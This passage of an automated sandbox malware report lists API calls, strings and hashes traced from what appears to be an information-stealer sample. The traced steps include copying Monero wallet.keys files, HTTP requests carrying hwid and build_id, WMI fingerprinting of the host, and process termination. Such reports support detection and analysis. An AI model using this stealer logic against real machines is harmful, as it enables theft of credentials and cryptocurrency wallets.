lstrcatA.KERNEL32(00000000,0042340C), ref: 00409137
lstrcatA.KERNEL32(00000000,00000000), ref: 00409147
lstrcatA.KERNEL32(00000000,0042340C), ref: 00409153
lstrcatA.KERNEL32(00000000,00000000), ref: 00409163
lstrcatA.KERNEL32(00000000,0042340C), ref: 0040916F
lstrcatA.KERNEL32(00000000,00000000), ref: 0040917F
lstrcatA.KERNEL32(00000000,0042340C), ref: 0040918B
lstrcatA.KERNEL32(00000000,00000000), ref: 0040919B
lstrcatA.KERNEL32(00000000,00423408), ref: 004091A7
lstrlenA.KERNEL32(00000000), ref: 004091FC
lstrlenA.KERNEL32(00000000), ref: 00409208
RtlAllocateHeap.NTDLL(00000000), ref: 00408FD0

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

DeleteFileA.KERNEL32(00000000), ref: 00409263

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
String ID:
API String ID: 2344884248-0
Opcode ID: c534b8a7b349933f1e0b5dcf0a0384b72e3cc01f2fceb047c9ffcd2788ba1ea9
Instruction ID: 01af279fe34659f2e92758b1277113fc8cf4a0ef9ee58042c38a489971cdbd96
Opcode Fuzzy Hash: c534b8a7b349933f1e0b5dcf0a0384b72e3cc01f2fceb047c9ffcd2788ba1ea9
Instruction Fuzzy Hash: 9AD13E72910504ABCB24FBA1DD56DEE7379AF54305F14813EF502724E2EF386A09CBA9

Function 00403E20 Relevance: 30.2, APIs: 13, Strings: 4, Instructions: 457networkfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000030), ref: 00403EC7
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040400D
HttpOpenRequestA.WININET(00000000,0251B668,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 00404048
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040406C

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

lstrlenA.KERNEL32(00000000,00000000,?,?,00416B92,?,004201E9,00000000,00416B92,?,00000000,00416B92,",00000000,00416B92,build_id), ref: 004042BD
lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 004042D6
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004042E7
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004042FE
InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 0040434A
InternetCloseHandle.WININET(00000000), ref: 00404355
InternetCloseHandle.WININET(?), ref: 00404367
InternetCloseHandle.WININET(00000000), ref: 00404371

Strings

", xrefs: 0040411C, 0040422C
hwid, xrefs: 004040FA
build_id, xrefs: 0040420A
------, xrefs: 00403F32, 00404072, 00404181

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
String ID: "$------$build_id$hwid
API String ID: 1585128682-50533134
Opcode ID: eb20b8eb14e2afa6ec9bbbb340feaad25749b98cb29f23b892b0ad84c940ba1b
Instruction ID: b133d135036fceaf129ec02b97349a15de150af5b357d63d1a2f8011ac320ed4
Opcode Fuzzy Hash: eb20b8eb14e2afa6ec9bbbb340feaad25749b98cb29f23b892b0ad84c940ba1b
Instruction Fuzzy Hash: 7DF1FE72910108AEDB15FBA1DC92EEE7378AF54704F54817EB112724D1EF386A0DCBA8

Function 00412000 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 295stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0041202B
lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,00000104), ref: 004120C1
lstrcpyA.KERNEL32(?,00000000), ref: 004120FA
lstrcpyA.KERNEL32(?,00000000), ref: 0041213C
lstrcpyA.KERNEL32(?,00000000), ref: 0041217E
lstrcpyA.KERNEL32(?,00000000), ref: 004121BF
StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412322
strtok_s.MSVCRT ref: 004123AC

Strings

false, xrefs: 0041233C
anA, xrefs: 0041200E, 004123A6, 00412016, 004123A9
true, xrefs: 0041231C

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID: anA$false$true
API String ID: 2610293679-3558530194
Opcode ID: 505c5f33d6859d5f329996cf1b9e9b390a1da153b642f850c233b391946fbe13
Instruction ID: 28ec9be6b1e855a5d5ad00fa29704b442616d7bac6571d6649f76a51c6d16edf
Opcode Fuzzy Hash: 505c5f33d6859d5f329996cf1b9e9b390a1da153b642f850c233b391946fbe13
Instruction Fuzzy Hash: B1A1B7B2D00204ABDB24EBB1DC45DEE777DEF54304F00456EF51AA6142EB78A6C9CB94

Function 00410730 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 171memorycomtimeCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
VariantInit.OLEAUT32(?), ref: 0041081B

Part of subcall function 00410630: CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
Part of subcall function 00410630: SysAllocString.OLEAUT32(?), ref: 0041067B
Part of subcall function 00410630: _wtoi64.MSVCRT ref: 004106BA
Part of subcall function 00410630: SysFreeString.OLEAUT32(?), ref: 004106D9
Part of subcall function 00410630: SysFreeString.OLEAUT32(00000000), ref: 004106E0

FileTimeToSystemTime.KERNEL32(?,00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410852
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 0041085E
HeapAlloc.KERNEL32(00000000,?,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000,?), ref: 00410865
VariantClear.OLEAUT32(?), ref: 004108A9
wsprintfA.USER32 ref: 00410891

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Strings

InstallDate, xrefs: 0041082D
%d/%d/%d %d:%d:%d, xrefs: 0041088B
ROOT\CIMV2, xrefs: 0041079B
WQL, xrefs: 004107D6
Unknown, xrefs: 004108CC
Select * From Win32_OperatingSystem, xrefs: 004107D1

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
API String ID: 1611285705-271508173
Opcode ID: d0b4a815b4d6e5164f017f1f581d001b50d511ed487778edabd0ee514babd502
Instruction ID: f60bae9c613f7fa121a8b30a4fe63b67029c37922dcc64605f50a105dcd30c53
Opcode Fuzzy Hash: d0b4a815b4d6e5164f017f1f581d001b50d511ed487778edabd0ee514babd502
Instruction Fuzzy Hash: 4B515071A01228BBCB24DB95DC45EEFBBBCEF49B10F104116F515A7280D7799A41CBE4

Function 00401A30 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 180registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401A48
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401A5E
HeapAlloc.KERNEL32(00000000), ref: 00401A65
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00416D8D), ref: 00401A82
RegQueryValueExA.ADVAPI32(00416D8D,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401A9C

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

RegCloseKey.ADVAPI32(00416D8D), ref: 00401AA6
lstrcatA.KERNEL32(?,00000000), ref: 00401AB4
lstrlenA.KERNEL32(?), ref: 00401AC1
lstrcatA.KERNEL32(?,.keys), ref: 00401ADC
CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401BC6
DeleteFileA.KERNEL32(00000000), ref: 00401C32

Strings

.keys, xrefs: 00401AD0
\Monero\wallet.keys, xrefs: 00401AF4
wallet_path, xrefs: 00401A96
SOFTWARE\monero-project\monero-core, xrefs: 00401A76

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: FileHeaplstrcat$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlenmemset
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 709784044-218353709
Opcode ID: 9771e5a43fec02422d45453e6555101f0312aa107fdf0b50a28b1de71087b5c9
Instruction ID: f1d60a6bbfd1a10beadc68d07a737e3e9b1c6f7b3b4a17850d8004e5f304ac36
Opcode Fuzzy Hash: 9771e5a43fec02422d45453e6555101f0312aa107fdf0b50a28b1de71087b5c9
Instruction Fuzzy Hash: CF513E72910108ABDB14FBA1DD56EEE737DAF54304F50803EF506724D2EB786A08CBA9

Function 004139E0 Relevance: 25.1, APIs: 11, Strings: 3, Instructions: 633sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413B47
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413BAA
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413CF3

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00412EE0: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,?,00413AD4), ref: 00412F20

Part of subcall function 00412FA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 00413011
Part of subcall function 00412FA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041304E
Part of subcall function 00412FA0: lstrlenA.KERNEL32(00000000), ref: 0041306B

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C90
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413DD9
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E3C
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F22
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413F85
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041406B
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004140C8
Sleep.KERNEL32(0000EA60), ref: 004140D7

Strings

9jA, xrefs: 00413B08, 00414284, 004140BF, 00413ABD, 00413C51, 00413CB4, 00413D9A, 00413DFD, 00413EE3, 00413F46, 0041402C, 0041408F, 00413FE1, 00413E98, 00413D4F, 00413C06, 00413B6B, 00413AC2, 00413B0D, 00413B70, 00413C0B, 00413C56, 00413CB9, 00413D54, 00413D9F, 00413E02, 00413E9D, 00413EE8, 00413F4B, 00413FE6, 00414031, 00414094
9jA, xrefs: 004141C4, 004141D9, 004141E1, 004141F6, 00414190, 004141A5, 004141AD, 0041415C, 00414171, 00414179, 00414125, 0041413A, 00414142, 004140EE, 00414103, 0041410B, 0041409A, 004140B2, 0041409D, 004140F1, 0041410E, 00414128, 00414145, 0041415F, 0041417C, 00414193, 004141B0, 004141C7, 004141E4
ERROR, xrefs: 00413B39, 00413B9C, 00413C82, 00413CE5, 00413DCB, 00413E2E, 00413F14, 00413F77, 0041405D, 004140BA

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: 9jA$9jA$ERROR
API String ID: 507064821-3453893218
Opcode ID: 4db796c9f8dce2cb1d27808f2ec78027f2f0dd32857c8870dde0eb165c906988
Instruction ID: cf25ed66686d9262e125a475b4914be09e4212f98396e3805e3bfcd737600e71
Opcode Fuzzy Hash: 4db796c9f8dce2cb1d27808f2ec78027f2f0dd32857c8870dde0eb165c906988
Instruction Fuzzy Hash: B82220729102086ACB24FB72DD57ADE773C6F14348F50857EB80672496EF3C674C8A69

Function 0040FFC0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 180registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

RegOpenKeyExA.KERNEL32(00000000,024F6730,00000000,00020019,00000000,004201E9), ref: 00410009
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
wsprintfA.USER32 ref: 0041007C
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
RegQueryValueExA.KERNEL32(00000000,0251D8E0,00000000,000F003F,?,00000400), ref: 004100CA
lstrlenA.KERNEL32(?), ref: 004100DF
RegQueryValueExA.KERNEL32(00000000,0251D748,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Strings

- , xrefs: 00410160
?, xrefs: 0040FFFB
%s\%s, xrefs: 00410076

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 1989970852-3278919252
Opcode ID: 643daf19ae7ed28cf589b7122f0c9c050e7703415097bdea3ce76851ccc1edb2
Instruction ID: 86116914c5d038b2623fcf9dac74439a401e9ecf48d0cd90823b8e99bbc113d5
Opcode Fuzzy Hash: 643daf19ae7ed28cf589b7122f0c9c050e7703415097bdea3ce76851ccc1edb2
Instruction Fuzzy Hash: 47613EB2900109AFDB14EB91DC95FEFB77DEF44704F00816AF605A3590EB786A49CBA4

Function 004043E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000030), ref: 0040441C
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000030), ref: 00404423
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404442
StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000030), ref: 0040445A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404482
HttpOpenRequestA.WININET(00000000,GET,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 004044BC
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004044E0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004044EF
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040450E
InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 00404566
InternetCloseHandle.WININET(00000000), ref: 00404597
InternetCloseHandle.WININET(00000000), ref: 004045A4
InternetCloseHandle.WININET(00000000), ref: 004045AB

Strings

GET, xrefs: 004044B6

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
